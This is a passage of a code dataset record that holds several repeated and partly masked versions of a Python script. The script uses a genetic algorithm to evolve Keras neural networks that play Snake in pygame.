self.clock = pygame.time.Clock()
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
if event.type == pygame.KEYDOWN:
if event.key == K_UP:
if self.frames < 1000000000:
self.frames *= 10
elif event.key == K_DOWN:
if self.frames > 10:
self.frames /= 10
elif event.key == K_p:
self.pause = not self.pause
elif event.key == K_q:
self.on_cleanup()
def on_loop(self, model_num):
self.snake.alive = self.snake.collision(self.snake.position[0])
if self.snake.alive is False:
return
if self.snake.eat(self.fruit) is True:
fitness[model_num] += 150
score[model_num] += 1
self.moves = 0
self.snake.update()
if check_if_closer(self.snake, self.fruit):
fitness[model_num] += 10
self.moves += 1
def on_render(self, model_num):
self._display_surf.fill((0, 124, 0))
for i in range(0, int(GRID_D)):
for j in range(0, int(GRID_D)):
if (i + j) % 2 == 0:
block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (
BLOCK_W, BLOCK_H)))
pygame.draw.rect(self._display_surf, (0, 200, 0), block)
self.fruit.draw(self._display_surf)
self.snake.draw(self._display_surf)
pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +
str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +
str(self.frames))
pygame.display.update()
def on_cleanup(self):
pygame.quit()
sys.exit()
def on_execute(self, i):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.snake.direction = predict_direction(self.snake, self.fruit, i)
if self.pause is False:
self.on_loop(i)
self.on_render(i)
self.clock.tick(self.frames)
if self.snake.alive == False or self.moves == MAX_MOVES:
print(int(self.snake.score))
self.snake.reset()
self.fruit.random_generate()
self.moves = 0
print(fitness[i])
break
print(int(self.snake.score))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import random
import sys
import math
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D, Activation
from snake_game import Snake
from snake_game import Fruit
import pygame
from pygame.locals import *
total_models = 50
current_pool = []
fitness = []
generation = 264
save = 0
save_location = 'Saved_Models/model'
load = 1
load_location = 'Saved_Models-better/model'
WIDTH = 480
HEIGHT = 480
GRID_D = 12
BLOCK_W = WIDTH / GRID_D
BLOCK_H = HEIGHT / GRID_D
MAX_MOVES = 150
score = []
def save_pool():
for i in range(total_models):
current_pool[i].save_weights(save_location + str(i) + '.keras')
print('Pool saved')
def create_model():
"""
Create Neural Network as a keras model
"""
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(4, activation='sigmoid'))
model.compile(loss='mse', optimizer='adam')
return model
def predict_direction(snake, fruit, model_num):
"""
This function feeds information into the model, then determines
which direction the snake should go
"""
direction = snake.check_head()
fruit = snake.check_fruit(fruit)
n_input = np.concatenate([direction, fruit])
n_input = np.atleast_2d(n_input)
output = current_pool[model_num].predict(n_input, 1)
return output.argmax()
def model_crossover(parent_1, parent_2):
"""
Produce offspring based on the best parents
"""
global current_pool
weight1 = current_pool[parent_1].get_weights()
weight2 = current_pool[parent_2].get_weights()
new_weight1 = weight1
new_weight2 = weight2
gene = random.randint(0, len(new_weight1) - 1)
new_weight1[gene] = weight2[gene]
new_weight2[gene] = weight1[gene]
return np.asarray([new_weight1, new_weight2])
def model_mutate(weights):
"""
Mutate the weights of a model
"""
for i in range(len(weights)):
for j in range(len(weights[i])):
if random.uniform(0, 1) > 0.7:
change = random.uniform(-0.5, 0.5)
weights[i][j] += change
return weights
def roulette_selection(total_fitness):
global fitness
choice = random.randint(0, total_fitness)
parent = 0
current = 0
for idx in range(total_models):
current += fitness[idx]
if current > choice:
parent = idx
break
return parent
def genetic_updates():
global current_pool
global fitness
global generation
new_weights = []
total_fitness = sum(fitness)
for i in range(total_models // 2):
parent_1 = roulette_selection(total_fitness)
parent_2 = roulette_selection(total_fitness)
new = model_crossover(parent_1, parent_2)
update_w1 = model_mutate(new[0])
update_w2 = model_mutate(new[1])
new_weights.append(update_w1)
new_weights.append(update_w2)
for i in range(len(new_weights)):
current_pool[i].set_weights(new_weights[i])
generation += 1
return
def check_if_closer(snake, fruit):
head = snake.position[0]
prev = snake.position[1]
head_dis = math.sqrt((fruit.pos[0] - head[0]) ** 2 + (fruit.pos[1] -
head[1]) ** 2)
prev_dis = math.sqrt((fruit.pos[0] - prev[0]) ** 2 + (fruit.pos[1] -
prev[1]) ** 2)
if head_dis > prev_dis:
return False
return True
class App:
"""
Main App for game
"""
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = WIDTH, HEIGHT
self.clock = None
self.snake = Snake()
self.fruit = Fruit()
self.pause = False
self.moves = 0
self.frames = 11
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(self.size, pygame.
HWSURFACE | pygame.DOUBLEBUF)
self._running = True
self.clock = pygame.time.Clock()
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
if event.type == pygame.KEYDOWN:
if event.key == K_UP:
if self.frames < 1000000000:
self.frames *= 10
elif event.key == K_DOWN:
if self.frames > 10:
self.frames /= 10
elif event.key == K_p:
self.pause = not self.pause
elif event.key == K_q:
self.on_cleanup()
def on_loop(self, model_num):
self.snake.alive = self.snake.collision(self.snake.position[0])
if self.snake.alive is False:
return
if self.snake.eat(self.fruit) is True:
fitness[model_num] += 150
score[model_num] += 1
self.moves = 0
self.snake.update()
if check_if_closer(self.snake, self.fruit):
fitness[model_num] += 10
self.moves += 1
def on_render(self, model_num):
self._display_surf.fill((0, 124, 0))
for i in range(0, int(GRID_D)):
for j in range(0, int(GRID_D)):
if (i + j) % 2 == 0:
block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (
BLOCK_W, BLOCK_H)))
pygame.draw.rect(self._display_surf, (0, 200, 0), block)
self.fruit.draw(self._display_surf)
self.snake.draw(self._display_surf)
pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +
str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +
str(self.frames))
pygame.display.update()
def on_cleanup(self):
pygame.quit()
sys.exit()
def on_execute(self, i):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.snake.direction = predict_direction(self.snake, self.fruit, i)
if self.pause is False:
self.on_loop(i)
self.on_render(i)
self.clock.tick(self.frames)
if self.snake.alive == False or self.moves == MAX_MOVES:
print(int(self.snake.score))
self.snake.reset()
self.fruit.random_generate()
self.moves = 0
print(fitness[i])
break
print(int(self.snake.score))
if __name__ == '__main__':
for i in range(total_models):
model = create_model()
current_pool.append(model)
fitness.append(-100)
score.append(0)
if load == 1:
for i in range(total_models):
current_pool[i].load_weights(load_location + str(i) + '.keras')
theApp = App()
while True:
for i in range(total_models):
fitness[i] = 0
score[i] = 0
for i in range(total_models):
theApp.on_execute(i)
print('Higest score: ' + str(max(score)) + ' Model: ' + str(score.index
(max(score))) + ' Gen: ' + str(generation))
if save == 1:
save_pool()
genetic_updates()
<|reserved_special_token_1|>
import random
import sys
import math
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D, Activation
from snake_game import Snake
from snake_game import Fruit
import pygame
from pygame.locals import *
# Neural Network globals
total_models = 50
current_pool = []
fitness = []
generation = 264
# 1 if want to save pool, 0 if not
save = 0
save_location = "Saved_Models/model"
load = 1
load_location = "Saved_Models-better/model"
# Game configurations
WIDTH = 480
HEIGHT = 480
GRID_D = 12
BLOCK_W = WIDTH / GRID_D
BLOCK_H = HEIGHT / GRID_D
MAX_MOVES = 150
score = []
# Save models to file
def save_pool():
for i in range(total_models):
current_pool[i].save_weights(save_location + str(i) + ".keras")
print("Pool saved")
def create_model():
'''
Create Neural Network as a keras model
'''
model = Sequential()
model.add(Dense(12, input_dim = 8, activation = 'relu'))
model.add(Dense(16, activation = 'relu'))
model.add(Dense(4, activation = 'sigmoid'))
model.compile(loss='mse', optimizer='adam')
return model
def predict_direction(snake, fruit, model_num):
'''
This function feeds information into the model, then determines
which direction the snake should go
'''
direction = snake.check_head()
fruit = snake.check_fruit(fruit)
n_input = np.concatenate([direction, fruit])
n_input = np.atleast_2d(n_input)
output = current_pool[model_num].predict(n_input, 1)
return output.argmax()
def model_crossover(parent_1, parent_2):
'''
Produce offspring based on the best parents
'''
global current_pool
# Weight of parents
weight1 = current_pool[parent_1].get_weights()
weight2 = current_pool[parent_2].get_weights()
new_weight1 = weight1
new_weight2 = weight2
# Gene
gene = random.randint(0, len(new_weight1) - 1)
new_weight1[gene] = weight2[gene]
new_weight2[gene] = weight1[gene]
return np.asarray([new_weight1, new_weight2])
def model_mutate(weights):
'''
Mutate the weights of a model
'''
for i in range(len(weights)):
for j in range(len(weights[i])):
if (random.uniform(0, 1) > .7):
change = random.uniform(-.5,.5)
weights[i][j] += change
return weights
def roulette_selection(total_fitness):
global fitness
choice = random.randint(0, total_fitness)
parent = 0
current = 0
for idx in range(total_models):
current += fitness[idx]
if current > choice:
parent = idx
break
return parent
def genetic_updates():
global current_pool
global fitness
global generation
new_weights = []
# Calculate total fitness
total_fitness = sum(fitness)
# Breeding time
for i in range(total_models // 2):
# Pick two parents
parent_1 = roulette_selection(total_fitness)
parent_2 = roulette_selection(total_fitness)
# Model crossover between two parents
new = model_crossover(parent_1, parent_2)
# Mutate models
update_w1 = model_mutate(new[0])
update_w2 = model_mutate(new[1])
new_weights.append(update_w1)
new_weights.append(update_w2)
# Set new weights, reset fitness
for i in range(len(new_weights)):
current_pool[i].set_weights(new_weights[i])
generation += 1
return
def check_if_closer(snake, fruit):
head = snake.position[0]
prev = snake.position[1]
# Calculate the heads distance from the fruit, and the previous spot
# to see if it got closer
head_dis = math.sqrt((fruit.pos[0] - head[0]) ** 2 + (fruit.pos[1] - head[1]) ** 2)
prev_dis = math.sqrt((fruit.pos[0] - prev[0]) ** 2 + (fruit.pos[1] - prev[1]) ** 2)
if head_dis > prev_dis:
return False
return True
class App:
'''
Main App for game
'''
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = WIDTH, HEIGHT
self.clock = None
self.snake = Snake()
self.fruit = Fruit()
self.pause = False
self.moves = 0
self.frames = 11
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(self.size, pygame.HWSURFACE | pygame.DOUBLEBUF)
self._running = True
self.clock = pygame.time.Clock()
def on_event(self, event):
# Quit game
if event.type == pygame.QUIT:
self._running = False
# Change direction of snake
if event.type == pygame.KEYDOWN:
if event.key == K_UP:
# Increase speed of game
if self.frames < 1000000000:
self.frames *= 10
elif event.key == K_DOWN:
# Decrease speed of game
if self.frames > 10:
self.frames /= 10
elif event.key == K_p:
self.pause = not self.pause
elif event.key == K_q:
self.on_cleanup()
def on_loop(self, model_num):
self.snake.alive = self.snake.collision(self.snake.position[0])
if self.snake.alive is False:
return
if self.snake.eat(self.fruit) is True:
# Adjust fitness, reset move counter
fitness[model_num] += 150
score[model_num] += 1
self.moves = 0
self.snake.update()
if check_if_closer(self.snake, self.fruit):
# Reward snake for moving towards fruit
fitness[model_num] += 10
self.moves += 1
def on_render(self, model_num):
self._display_surf.fill((0,124,0))
# Fill every other space to create a multi color grid
for i in range(0, int(GRID_D)):
for j in range(0, int(GRID_D)):
if (i + j) % 2 == 0:
block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (BLOCK_W, BLOCK_H)))
pygame.draw.rect(self._display_surf, (0, 200, 0), block)
# Draw sanke and fruit
self.fruit.draw(self._display_surf)
self.snake.draw(self._display_surf)
pygame.display.set_caption("Gen: " + str(generation) + " Model: " + str(model_num) + " Score: " + str(self.snake.score) + " Tick " + str(self.frames))
pygame.display.update()
def on_cleanup(self):
pygame.quit()
sys.exit()
def on_execute(self, i):
if self.on_init() == False:
self._running = False
while (self._running):
for event in pygame.event.get():
self.on_event(event)
self.snake.direction = predict_direction(self.snake, self.fruit, i)
# Checks if game is paused
if self.pause is False:
self.on_loop(i)
self.on_render(i)
self.clock.tick(self.frames)
# Reset when snake dies
if self.snake.alive == False or self.moves == MAX_MOVES:
print(int(self.snake.score))
self.snake.reset()
self.fruit.random_generate()
self.moves = 0
# Print fitness
print(fitness[i])
break
# Clean up and print score
# self.on_cleanup()
print(int(self.snake.score))
if __name__ == "__main__" :
# Init models
for i in range(total_models):
model = create_model()
current_pool.append(model)
fitness.append(-100)
score.append(0)
if load == 1:
for i in range(total_models):
current_pool[i].load_weights(load_location + str(i) + ".keras")
theApp = App()
while True:
# Reset fitness scores and player scores
for i in range(total_models):
fitness[i] = 0
score[i] = 0
# Play game for each model
for i in range(total_models):
theApp.on_execute(i)
# Print high score to screen
print("Higest score: " + str(max(score)) + " Model: " + str(score.index(max(score))) + " Gen: " + str(generation))
# Write these values to a file
# fi = open("results.txt", "a+")
# fi.write("Higest score: " + str(max(score)) + " Model: " + str(score.index(max(score))) + " Gen: " + str(generation) + "\r\n")
# fi.close()
# Save pool
if save == 1:
save_pool()
genetic_updates()
|
flexible
|
{
"blob_id": "fc1b9ab1fb1ae71d70b3bf5c879a5f604ddef997",
"index": 9969,
"step-1": "<mask token>\n\n\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + '.keras')\n print('Pool saved')\n\n\ndef create_model():\n \"\"\"\n Create Neural Network as a keras model\n \"\"\"\n model = Sequential()\n model.add(Dense(12, input_dim=8, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(4, activation='sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef predict_direction(snake, fruit, model_num):\n \"\"\"\n This function feeds information into the model, then determines\n which direction the snake should go\n \"\"\"\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n output = current_pool[model_num].predict(n_input, 1)\n return output.argmax()\n\n\n<mask token>\n\n\ndef model_mutate(weights):\n \"\"\"\n Mutate the weights of a model\n \"\"\"\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if random.uniform(0, 1) > 0.7:\n change = random.uniform(-0.5, 0.5)\n weights[i][j] += change\n return weights\n\n\n<mask token>\n\n\nclass App:\n \"\"\"\n Main App for game\n \"\"\"\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause = False\n self.moves = 0\n self.frames = 11\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.\n HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n if self.frames < 1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n if check_if_closer(self.snake, self.fruit):\n fitness[model_num] += 10\n self.moves += 1\n\n def on_render(self, model_num):\n self._display_surf.fill((0, 124, 0))\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (\n BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n self.fruit.draw(self._display_surf)\n self.snake.draw(self._display_surf)\n pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +\n str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +\n str(self.frames))\n pygame.display.update()\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n while self._running:\n for event in pygame.event.get():\n self.on_event(event)\n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n print(fitness[i])\n break\n print(int(self.snake.score))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + '.keras')\n print('Pool saved')\n\n\ndef create_model():\n \"\"\"\n Create Neural Network as a keras model\n \"\"\"\n model = Sequential()\n model.add(Dense(12, input_dim=8, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(4, activation='sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef predict_direction(snake, fruit, model_num):\n \"\"\"\n This function feeds information into the model, then determines\n which direction the snake should go\n \"\"\"\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n output = current_pool[model_num].predict(n_input, 1)\n return output.argmax()\n\n\n<mask token>\n\n\ndef model_mutate(weights):\n \"\"\"\n Mutate the weights of a model\n \"\"\"\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if random.uniform(0, 1) > 0.7:\n change = random.uniform(-0.5, 0.5)\n weights[i][j] += change\n return weights\n\n\ndef roulette_selection(total_fitness):\n global fitness\n choice = random.randint(0, total_fitness)\n parent = 0\n current = 0\n for idx in range(total_models):\n current += fitness[idx]\n if current > choice:\n parent = idx\n break\n return parent\n\n\ndef genetic_updates():\n global current_pool\n global fitness\n global generation\n new_weights = []\n total_fitness = sum(fitness)\n for i in range(total_models // 2):\n parent_1 = roulette_selection(total_fitness)\n parent_2 = roulette_selection(total_fitness)\n new = model_crossover(parent_1, parent_2)\n update_w1 = model_mutate(new[0])\n update_w2 = model_mutate(new[1])\n new_weights.append(update_w1)\n new_weights.append(update_w2)\n for i in range(len(new_weights)):\n current_pool[i].set_weights(new_weights[i])\n generation += 1\n return\n\n\n<mask token>\n\n\nclass App:\n \"\"\"\n Main App for game\n \"\"\"\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause = False\n self.moves = 0\n self.frames = 11\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.\n HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n if self.frames < 1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n if check_if_closer(self.snake, self.fruit):\n fitness[model_num] += 10\n self.moves += 1\n\n def on_render(self, model_num):\n self._display_surf.fill((0, 124, 0))\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (\n BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n self.fruit.draw(self._display_surf)\n self.snake.draw(self._display_surf)\n pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +\n str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +\n str(self.frames))\n pygame.display.update()\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n while self._running:\n for event in pygame.event.get():\n self.on_event(event)\n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n print(fitness[i])\n break\n print(int(self.snake.score))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + '.keras')\n print('Pool saved')\n\n\ndef create_model():\n \"\"\"\n Create Neural Network as a keras model\n \"\"\"\n model = Sequential()\n model.add(Dense(12, input_dim=8, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(4, activation='sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef predict_direction(snake, fruit, model_num):\n \"\"\"\n This function feeds information into the model, then determines\n which direction the snake should go\n \"\"\"\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n output = current_pool[model_num].predict(n_input, 1)\n return output.argmax()\n\n\ndef model_crossover(parent_1, parent_2):\n \"\"\"\n Produce offspring based on the best parents\n \"\"\"\n global current_pool\n weight1 = current_pool[parent_1].get_weights()\n weight2 = current_pool[parent_2].get_weights()\n new_weight1 = weight1\n new_weight2 = weight2\n gene = random.randint(0, len(new_weight1) - 1)\n new_weight1[gene] = weight2[gene]\n new_weight2[gene] = weight1[gene]\n return np.asarray([new_weight1, new_weight2])\n\n\ndef model_mutate(weights):\n \"\"\"\n Mutate the weights of a model\n \"\"\"\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if random.uniform(0, 1) > 0.7:\n change = random.uniform(-0.5, 0.5)\n weights[i][j] += change\n return weights\n\n\ndef roulette_selection(total_fitness):\n global fitness\n choice = random.randint(0, total_fitness)\n parent = 0\n current = 0\n for idx in range(total_models):\n current += fitness[idx]\n if current > choice:\n parent = idx\n break\n return parent\n\n\ndef genetic_updates():\n global current_pool\n global fitness\n global generation\n new_weights = []\n total_fitness = sum(fitness)\n for i in range(total_models // 2):\n parent_1 = roulette_selection(total_fitness)\n parent_2 = roulette_selection(total_fitness)\n new = model_crossover(parent_1, parent_2)\n update_w1 = model_mutate(new[0])\n update_w2 = model_mutate(new[1])\n new_weights.append(update_w1)\n new_weights.append(update_w2)\n for i in range(len(new_weights)):\n current_pool[i].set_weights(new_weights[i])\n generation += 1\n return\n\n\n<mask token>\n\n\nclass App:\n \"\"\"\n Main App for game\n \"\"\"\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause = False\n self.moves = 0\n self.frames = 11\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.\n HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n if self.frames < 1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n if check_if_closer(self.snake, self.fruit):\n fitness[model_num] += 10\n self.moves += 1\n\n def on_render(self, model_num):\n self._display_surf.fill((0, 124, 0))\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (\n BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n self.fruit.draw(self._display_surf)\n self.snake.draw(self._display_surf)\n pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +\n str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +\n str(self.frames))\n pygame.display.update()\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n while self._running:\n for event in pygame.event.get():\n self.on_event(event)\n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n print(fitness[i])\n break\n print(int(self.snake.score))\n\n\n<mask token>\n",
"step-4": "import random\nimport sys\nimport math\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, Activation\nfrom snake_game import Snake\nfrom snake_game import Fruit\nimport pygame\nfrom pygame.locals import *\ntotal_models = 50\ncurrent_pool = []\nfitness = []\ngeneration = 264\nsave = 0\nsave_location = 'Saved_Models/model'\nload = 1\nload_location = 'Saved_Models-better/model'\nWIDTH = 480\nHEIGHT = 480\nGRID_D = 12\nBLOCK_W = WIDTH / GRID_D\nBLOCK_H = HEIGHT / GRID_D\nMAX_MOVES = 150\nscore = []\n\n\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + '.keras')\n print('Pool saved')\n\n\ndef create_model():\n \"\"\"\n Create Neural Network as a keras model\n \"\"\"\n model = Sequential()\n model.add(Dense(12, input_dim=8, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(4, activation='sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef predict_direction(snake, fruit, model_num):\n \"\"\"\n This function feeds information into the model, then determines\n which direction the snake should go\n \"\"\"\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n output = current_pool[model_num].predict(n_input, 1)\n return output.argmax()\n\n\ndef model_crossover(parent_1, parent_2):\n \"\"\"\n Produce offspring based on the best parents\n \"\"\"\n global current_pool\n weight1 = current_pool[parent_1].get_weights()\n weight2 = current_pool[parent_2].get_weights()\n new_weight1 = weight1\n new_weight2 = weight2\n gene = random.randint(0, len(new_weight1) - 1)\n new_weight1[gene] = weight2[gene]\n new_weight2[gene] = weight1[gene]\n return np.asarray([new_weight1, new_weight2])\n\n\ndef model_mutate(weights):\n \"\"\"\n Mutate the weights of a model\n \"\"\"\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if random.uniform(0, 1) > 0.7:\n change = random.uniform(-0.5, 0.5)\n weights[i][j] += change\n return weights\n\n\ndef roulette_selection(total_fitness):\n global fitness\n choice = random.randint(0, total_fitness)\n parent = 0\n current = 0\n for idx in range(total_models):\n current += fitness[idx]\n if current > choice:\n parent = idx\n break\n return parent\n\n\ndef genetic_updates():\n global current_pool\n global fitness\n global generation\n new_weights = []\n total_fitness = sum(fitness)\n for i in range(total_models // 2):\n parent_1 = roulette_selection(total_fitness)\n parent_2 = roulette_selection(total_fitness)\n new = model_crossover(parent_1, parent_2)\n update_w1 = model_mutate(new[0])\n update_w2 = model_mutate(new[1])\n new_weights.append(update_w1)\n new_weights.append(update_w2)\n for i in range(len(new_weights)):\n current_pool[i].set_weights(new_weights[i])\n generation += 1\n return\n\n\ndef check_if_closer(snake, fruit):\n head = snake.position[0]\n prev = snake.position[1]\n head_dis = math.sqrt((fruit.pos[0] - head[0]) ** 2 + (fruit.pos[1] -\n head[1]) ** 2)\n prev_dis = math.sqrt((fruit.pos[0] - prev[0]) ** 2 + (fruit.pos[1] -\n prev[1]) ** 2)\n if head_dis > prev_dis:\n return False\n return True\n\n\nclass App:\n \"\"\"\n Main App for game\n \"\"\"\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause = False\n self.moves = 0\n self.frames = 11\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.\n HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n if self.frames < 1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n if check_if_closer(self.snake, self.fruit):\n fitness[model_num] += 10\n self.moves += 1\n\n def on_render(self, model_num):\n self._display_surf.fill((0, 124, 0))\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (\n BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n self.fruit.draw(self._display_surf)\n self.snake.draw(self._display_surf)\n pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +\n str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +\n str(self.frames))\n pygame.display.update()\n\n def on_cleanup(self):\n pygame.quit()\n 